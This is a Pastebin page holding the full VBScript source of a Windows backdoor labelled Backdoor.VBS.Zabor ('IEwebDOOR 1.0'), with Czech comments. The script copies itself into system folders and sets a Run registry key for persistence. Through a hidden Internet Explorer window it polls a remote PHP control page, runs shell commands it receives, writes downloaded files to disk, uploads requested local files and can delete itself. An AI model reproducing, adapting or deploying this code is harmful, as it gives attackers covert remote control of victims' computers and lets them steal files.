API tools faq
paste
FlyFar

Backdoor.VBS.Zabor - Source Code

FlyFar
Jun 13th, 2023
152
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 8.47 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. '*******************
  2. '*  IEwebDOOR 1.0  *
  3. '*******************
  4. '*   WWW.SOOM.CZ   *
  5. '*       2006      *
  6. '*    .cCuMiNn.    *
  7. '*******************
  8.  
  9. strIdentString   = "XXXXXXXXXX"
  10. strPath          = "C:\WINDOWS\"
  11. strPathAlter     = "C:\"
  12. strName          = "sysconf32"
  13.  
  14. strKlic          = "\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & strName
  15. Set WshShell     = WScript.CreateObject ("WScript.Shell")
  16. strJmenoSoubor   = WScript.ScriptFullName
  17. strCestaSoubor   = Mid(strJmenoSoubor, 1, InStrRev(strJmenoSoubor, "\"))
  18. strLink          = "http://www.soom.cz/projects/webdoor/enter.php?client=" & strIdentString
  19. strAlphabet      = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
  20. Set objProstredi = WshShell.Environment("Process")
  21. strOSNT          = objProstredi("OS")
  22. intWaitMinut     = 10
  23.  
  24. bStartReg()
  25.  
  26. bAkce()
  27.  
  28. Function bAkce()
  29. On Error Resume Next : Err.Clear
  30.   Set objIE = WScript.CreateObject("InternetExplorer.Application")
  31.   Do While true
  32.     objIE.Navigate (strLink)
  33.     objIE.Visible = 0
  34.     If Err.Number <> 0 Then Exit Function
  35.     Do While objIE.Busy
  36.       WScript.Sleep(200)
  37.     Loop
  38.     intWaitMinut  = objIE.Document.form_backdoor.interval.value
  39.     bZobraz       = objIE.Document.form_backdoor.in_hide.checked
  40.     intCekani     = objIE.Document.form_backdoor.in_wait.checked
  41.     strPrikaz     = objIE.Document.form_backdoor.in_command.value
  42.     strDownload   = objIE.Document.form_backdoor.in_download.value
  43.     strUpload     = objIE.Document.form_backdoor.in_upload.value
  44.     If Err.Number <> 0 Then
  45.       Err.Clear
  46.       objIE.Quit
  47.       Exit Function
  48.     End If
  49.     strError = ""
  50.     If (strDownload <> "") And (strOSNT<>"") Then
  51.       strBase64 = objIE.Document.form_backdoor.base64.value
  52.       strBinary = strBase64Decode (strBase64)
  53.       If SaveFile(strCestaSoubor & strDownload, strBinary)= false Then
  54.         strError = strError & "- Sobor (" & strDownload & ") se nepoda�ilo nahr�t na ovl�dan� syst�m!" & vbCrLf
  55.       Else
  56.         strError = strError & "- Sobor (" & strDownload & ") se poda�ilo �p�n� nahr�t na ovl�dan� syst�m!" & vbCrLf
  57.       End If
  58.     End If
  59.     objIE.Document.form_backdoor.base64.value = ""
  60.     If bZobraz Then bZobraz = false
  61.     If strPrikaz = "autodestroy" Then
  62.       objIE.Document.form_backdoor.error.value = strAutodestroy()
  63.       objIE.Document.form_backdoor.submit()
  64.       Do While (objIE.Busy)
  65.         WScript.Sleep 200
  66.       Loop
  67.       objIE.Quit
  68.       WScript.Quit
  69.     End If
  70.     If (strPrikaz <> "") Then
  71.       strPrikaz = "%COMSPEC% /c " & """" & strPrikaz & """"
  72.       WshShell.Run strPrikaz, bZobraz, bCekani
  73.     End If
  74.     If (strUpload<>"") And (strOSNT<>"") Then
  75.       Set objFso = WScript.CreateObject ("Scripting.FileSystemObject")
  76.       If objFso.FileExists(strUpload) Then
  77.         strBinary = LoadFile (strUpload)
  78.         If LenB(strBinary)>0 Then
  79.           strData_base64 = strBase64Encode (strBinary)
  80.           objIE.Document.form_backdoor.base64.value = strData_base64
  81.         Else
  82.           objIE.Document.form_backdoor.in_upload.value = ""
  83.           objIE.Document.form_backdoor.base64.value = ""
  84.           strError = strError & "- Vy��dan� soubor (" & strUpload & ") se nepoda�ilo na��st!" & vbCrLf
  85.         End If
  86.       Else
  87.         objIE.Document.form_backdoor.in_upload.value = ""
  88.         objIE.Document.form_backdoor.base64.value = ""
  89.         strError = strError & "- Vy��dan� soubor (" & strUpload & ") nenalezen!" & vbCrLf
  90.       End If
  91.     End If
  92.     objIE.Document.form_backdoor.error.value = strError
  93.     objIE.Document.form_backdoor.submit()
  94.     Do While (objIE.Busy)
  95.       WScript.Sleep 200
  96.     Loop
  97.     bAkce = true
  98.     For I = 1 To intWaitMinut
  99.       WScript.Sleep(60000)
  100.     Next
  101.   Loop
  102. End Function
  103.  
  104. function strAutodestroy()
  105.   On Error Resume Next : Err.Clear
  106.   WshShell.RegDelete ("HKLM"+strKlic)
  107.   If Err.Number = 0 Then  
  108.     strError = strError & "- Klient byl �sp�n� odstran�n z registru." & vbCrLf
  109.   Else
  110.     Err.Clear
  111.     WshShell.RegDelete ("HKCU"+strKlic)
  112.     If Err.Number = 0 Then
  113.       strError = strError & "- Klient byl �sp�n� odstran�n z registru." & vbCrLf
  114.     Else
  115.       Err.Clear
  116.       strError = strError & "- Klienta se nepoda�ilo odstranit z registru." & vbCrLf
  117.     End If
  118.   End If
  119.   Set objFso = WScript.CreateObject ("Scripting.FileSystemObject")
  120.   objFso.DeleteFile strPath & strName & ".vbs", true
  121.   If Err.Number = 0 Then
  122.     strError = strError & "- Klient byl �sp�n� odstran�n z disku." & vbCrLf
  123.   Else  
  124.     Err.Clear
  125.     objFso.DeleteFile strPathAlter & strName & ".vbs", true
  126.     If Err.Number = 0 Then
  127.       strError = strError & "- Klient byl �sp�n� odstran�n z disku." & vbCrLf
  128.     Else
  129.       Err.Clear
  130.       strError = strError & "- Klienta se nepoda�ilo odstranit z disku." & vbCrLf
  131.     End If
  132.   End If
  133.   strAutodestroy = strError
  134. End Function
  135.  
  136. Function bStartReg()
  137.   On Error Resume Next : Err.Clear
  138.   if (strCestaSoubor <> strPath) And (strCestaSoubor <> strPathAlter) Then
  139.     Set objFso  = WScript.CreateObject ("Scripting.FileSystemObject")
  140.     Set objFile = objFso.GetFile (strJmenoSoubor)
  141.     strCesta    = strPath & strName & ".vbs"
  142.     objFile.Copy (strCesta)
  143.     If Err.Number <> 0 Then
  144.       Err.Clear
  145.       strCesta  = strPathAlter & strName & ".vbs"
  146.       objFile.Copy (strCesta)
  147.       If Err.Number <> 0 Then
  148.         Err.Clear
  149.         bStartReg = false
  150.         Exit Function
  151.       End If
  152.     End If
  153.     WshShell.RegWrite "HKLM" & strKlic, strCesta, "REG_SZ"
  154.     If Err.Number <> 0 Then
  155.       Err.Clear
  156.       WshShell.RegWrite "HKCU" & strKlic, strCesta, "REG_SZ"
  157.       If Err.Number <> 0 Then
  158.         Err.Clear
  159.         bStartReg = false
  160.         Exit Function
  161.       End If
  162.     End If
  163.     WshShell.Run strCesta, 0, false
  164.     If Err.Number = 0 Then WScript.Quit
  165.   End If
  166.   bStartReg = true
  167. End function
  168.  
  169. Function strBase64Encode(binString)
  170. On Error Resume Next : Err.Clear
  171.   vystup = ""
  172.   dopln  = ""
  173.   Dim b64znak(4)
  174.   binString = MidB(binString, 1, LenB(binString))
  175.   Do While (LenB(binString) Mod 3)
  176.     binString = binString & ChrB(0)
  177.     dopln = dopln & "="
  178.   Loop
  179.   For i = 1 To LenB(binString) Step 3
  180.     ascZnak1   = MidB(binString, i,   1)
  181.     ascZnak2   = MidB(binString, i+1, 1)
  182.     ascZnak3   = MidB(binString, i+2, 1)
  183.     b64znak(1) = (AscB(ascZnak1)  And 252)/4
  184.     b64znak(2) = ((AscB(ascZnak1) And 3)*16)+((AscB(ascZnak2) And 240)/16)
  185.     b64znak(3) = ((AscB(ascZnak2) And 15)*4 )+((AscB(ascZnak3) And 192)/64)
  186.     b64znak(4) = AscB(ascZnak3)   And 63
  187.     For y = 1 To 4
  188.       vystup   = vystup + Mid(strAlphabet, b64znak(y)+1, 1)
  189.     Next
  190.   Next
  191.   vystup   = Left(vystup, len(vystup)-len(dopln)) & dopln
  192.   If Err.Number = 0 Then
  193.     strBase64Encode = vystup
  194.   Else
  195.     Err.Clear
  196.     strBase64Encode = false
  197.   End If
  198. End Function
  199.  
  200. Function strBase64Decode (binString)
  201.   On Error Resume Next : Err.Clear
  202.   vystup = ""
  203.   dopln  = ""
  204.   Dim b64znak(4)
  205.   For i = 0 To Len(binString)-2 Step 4
  206.     For y = 1 To 4
  207.        b64znak(y) = InStr(strAlphabet, Mid(binString, i+y, 1))-1
  208.        If b64znak(y) < 0 Then
  209.           i = i + 1
  210.           y = y - 1
  211.        End If
  212.        If b64znak(y) = 64 Then
  213.          i = i + 1
  214.          y = y - 1
  215.          dopln = dopln & "A"
  216.        End If
  217.     Next
  218.     ascZnak1 = (b64znak(1)*4)+((b64znak(2) And 48)/16)
  219.     ascZnak2 = ((b64znak(2) And 15)*16)+((b64znak(3) And 60)/4)
  220.     ascZnak3 = ((b64znak(3) And 3)*64)+b64znak(4)
  221.     vystup   = vystup & Chr(ascZnak1) & Chr(ascZnak2) & Chr(ascZnak3)
  222.   Next
  223.   vystup = Left(vystup, Len(vystup) - Len(dopln))
  224.   If Err.Number = 0 Then
  225.     strBase64Decode = vystup
  226.   Else
  227.     Err.Clear
  228.     strBase64Decode = false
  229.   End If
  230. End Function
  231.  
  232. Function LoadFile(FileName)
  233.   On Error Resume Next : Err.Clear
  234.   Set objBinaryStream = CreateObject("ADODB.Stream")
  235.   objBinaryStream.Type = 1
  236.   objBinaryStream.Open
  237.   objBinaryStream.LoadFromFile FileName
  238.   If Err.Number = 0 Then
  239.     LoadFile = objBinaryStream.Read
  240.   Else
  241.     Err.Clear
  242.     LoadFile = false
  243.   End If
  244. End Function
  245.  
  246. Function SaveFile (FileName, text)
  247.   On Error Resume Next : Err.Clear
  248.   Set objTextStream     = WScript.CreateObject ("ADODB.Stream")
  249.   objTextStream.type    = 2
  250.   objTextStream.charset = "Windows-1250"
  251.   objTextStream.open()
  252.   objTextStream.WriteText text
  253.   objTextStream.saveToFile FileName, 2
  254.   objTextStream.Close
  255.   If Err.Number = 0 Then
  256.     SaveFile = true
  257.   Else
  258.     Err.Clear
  259.     SaveFile = false
  260.   End If
  261. End Function
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!